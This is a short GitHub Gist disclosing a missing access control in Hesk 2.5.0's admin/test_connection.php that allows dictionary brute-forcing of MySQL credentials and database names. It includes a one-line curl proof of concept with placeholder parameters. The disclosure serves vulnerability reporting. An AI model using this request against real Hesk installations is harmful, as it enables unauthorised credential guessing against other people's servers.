Created
August 6, 2014 19:51
-
-
Save cedriczirtacic/c32e8e4348b216c8d555 to your computer and use it in GitHub Desktop.
Hesk 2.5.0 Connection Brute Force
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (*) There isn't an access control in the file test_connection.php, which performs tests for MySQL connections (also POP3 and SMTP). This can give an attacker the opportunity to perform a dictionary bruteforce attack and check every possible combination of username/password and/or databases without having the need to make a real connection to the MySQL service. | |
| (*) proof-of-concept: | |
| curl 'http://www.website.com/admin/test_connection.php' -H 'Host: www.website.com' --data 'test=mysql&s_db_host=localhost&s_db_name=DATABASE&s_db_user=USERNAME&s_db_pass=PASSWORD&s_db_pfix=hesk_' --compressed | |
| Where USERNAME, PASSWORD and DATABASE are parameters to bruteforce. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment